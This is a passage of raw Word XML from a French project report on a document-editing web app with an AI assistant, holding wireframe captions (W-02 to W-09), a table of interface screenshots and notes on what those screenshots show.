        <w:t>W-02 — Inscription (/register). Politique de mot de passe affichée en continu, consentement RGPD explicite et non pré-coché.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2571208"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2571208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-03 — Connexion et récupération (/login · /forgot-password · /reset-password). Parcours de récupération complet, réponse anti-énumération identique que l'adresse existe ou non.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2965886"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2965886"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-04 — Tableau de bord (/dashboard). Trois compteurs de statut, trois portes d'entrée vers la rédaction, état vide explicite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3534686"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="3534686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-05 — Liste des documents (/documents). Colonne dossiers, recherche et filtre statut, pagination serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3023927"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="3023927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-06 — Éditeur de document (/documents/:id). Les cinq zones de l'écran central, indicateur d'enregistrement, historique IA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3290914"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="3290914"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-07 — Assistant IA (surcouche modale de /documents/:id). Action, portée, consigne libre, insérer / remplacer / annuler. Aucune modification du document sans décision de l'utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2582816"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2582816"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-08 — Back-office (/admin). Statistiques globales, édition du rôle et du quota en ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="4469143"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="4469143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-09 — Enchaînement des écrans (—). Zones d'accès, gardes de navigation, transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8E338" w14:textId="5F27DB2B" w:rsidR="003A2DEC" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc198828322"/>
      <w:r>
        <w:t xml:space="preserve">Les </w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC">
        <w:t>captures d’écrans d’interfaces utilisateurs et le code correspondant</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Captures réalisées sur l'application en fonctionnement, avec un compte de démonstration. Fichiers dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs/captures/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">du dépôt.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofi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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Écran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ce que la capture démontre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-01-accueil.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accueil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Positionnement produit, appels à l'action, footer légal complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-01b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-01b-accueil-mobile.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accueil (mobile)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Adaptation au petit écran : empilement, menu replié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-02-connexion.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Formulaire, bascule de visibilité du mot de passe, lien de récupération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-03-inscription.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Politique de mot de passe affichée en continu, consentement RGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-04-mot-de-passe-oublie.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe oublié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Demande de lien, message de confirmation anti-énumération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-05-tableau-de-bord.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trois compteurs, trois portes d'entrée, état vide explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-06-liste-documents.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste des documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dossiers, recherche, statuts, pagination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C-07-nouveau-document.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nouveau document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur Markdown, barre d'outils, aperçu, validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ce qu'une capture montre et ce qu'elle ne montre pas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ces images attestent d'états, pas de comportements. Deux exemples le rappellent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le tableau de bord (C-05) n'affiche pas le quota IA restant : ce n'est pas un oubli, l'information est présentée dans le panneau de l'assistant, au moment où elle sert à décider. La répéter sur le tableau de bord aurait ajouté un quatrième compteur sans valeur d'usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>L'écran de création (C-07) ne montre pas l'indicateur d'enregistrement automatique : le document est vierge, le titre est vide, et le mécanisme ne s'arme qu'à partir d'un titre valide. La fonctionnalité est bien présente (§ 7.1) ; seule une séquence d'actions permet de l'observer, ce qui est précisément l'objet du jeu d'essai du § 10 et non d'une capture isolée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="4669988"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-01-accueil.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="4669988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-01 — accueil (/).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="1800000" cy="3102823"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-01b-accueil-mobile.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1800000" cy="3102823"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-01b — accueil en affichage mobile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4500000" cy="3460701"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-02-connexion.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4500000" cy="3460701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Capture C-02 — connexion (/login).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4320000" cy="3975236"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="C-03-inscription.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
